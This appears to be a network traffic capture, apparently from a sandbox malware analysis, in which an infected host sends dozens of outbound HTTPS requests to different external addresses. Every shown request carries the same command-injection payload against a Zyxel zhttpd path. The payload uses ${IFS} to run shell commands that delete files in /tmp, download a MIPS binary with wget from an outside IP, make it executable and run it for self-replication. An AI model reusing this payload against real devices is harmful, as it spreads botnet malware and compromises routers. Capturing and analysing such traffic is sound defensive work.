                                      Jan 19, 2024 17:29:44.006555080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7210192.168.2.143817012.132.210.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006581068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7211192.168.2.1448030123.113.233.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006649971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7212192.168.2.1441438213.236.69.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006699085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7213192.168.2.1453970208.104.139.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006724119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7214192.168.2.1457762167.138.11.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006782055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7215192.168.2.1438784149.150.102.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006843090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7216192.168.2.145548066.102.78.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006864071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7217192.168.2.143958432.180.169.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006896019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7218192.168.2.1444444145.45.18.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006942034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7219192.168.2.145504262.199.213.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.006978035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7220192.168.2.143394657.24.66.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007009983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7221192.168.2.1439402222.199.26.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007067919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7222192.168.2.143869417.77.174.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007103920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7223192.168.2.146032854.72.99.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007145882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7224192.168.2.1457914165.84.42.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007179022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7225192.168.2.145115235.106.224.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007205009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7226192.168.2.1451728181.29.219.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007270098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7227192.168.2.1456406112.183.253.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007289886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7228192.168.2.1438800136.230.87.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007333040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7229192.168.2.1437058205.25.151.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007364035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7230192.168.2.143706098.197.251.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007441044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7231192.168.2.1445852101.148.128.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007472992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7232192.168.2.1441248177.22.44.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007510900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7233192.168.2.143888847.235.180.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007567883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7234192.168.2.1449206132.89.29.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007591009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7235192.168.2.1460326163.70.75.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007617950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7236192.168.2.1458324123.18.231.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007649899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7237192.168.2.1456898136.71.203.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007694006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7238192.168.2.1439008155.248.100.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007752895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7239192.168.2.1454190167.111.238.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007810116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7240192.168.2.1454580191.99.106.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007838011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7241192.168.2.1456520161.212.7.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007874012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7242192.168.2.1453994207.134.44.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007905960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7243192.168.2.14419984.207.204.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007939100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7244192.168.2.1434904192.114.108.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.007965088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7245192.168.2.1449382107.222.125.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008027077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7246192.168.2.144841023.65.126.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008074045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7247192.168.2.146086812.159.206.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008119106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7248192.168.2.1458740160.219.176.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008156061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7249192.168.2.143880693.56.13.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008203983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7250192.168.2.1443650107.71.92.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008244991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7251192.168.2.144433080.235.2.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008264065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7252192.168.2.1459562206.2.134.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008305073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7253192.168.2.1435528104.56.37.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008351088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7254192.168.2.144635048.148.132.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008373022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7255192.168.2.145334849.169.116.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008424997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7256192.168.2.1460730107.71.48.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008449078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7257192.168.2.1459540218.14.93.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008493900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7258192.168.2.144496612.15.30.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008521080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7259192.168.2.1435484144.76.4.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008642912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7260192.168.2.144937636.135.116.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008644104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7261192.168.2.1440976124.177.105.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008666992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7262192.168.2.1441748117.69.173.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008686066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7263192.168.2.143581672.208.204.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008754015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7264192.168.2.143313825.180.146.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008783102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7265192.168.2.1435834213.67.186.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008805037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7266192.168.2.1433206213.128.74.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008852959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7267192.168.2.1437094126.100.97.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008897066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7268192.168.2.1442578170.200.201.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008954048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7269192.168.2.1447796191.65.36.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.008977890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7270192.168.2.1436646181.153.238.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009063959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7271192.168.2.1457558145.248.30.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009078026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7272192.168.2.1453202181.152.140.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:44.009114027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7273192.168.2.1442640117.243.106.209443
                                      TimestampBytes transferredDirectionData
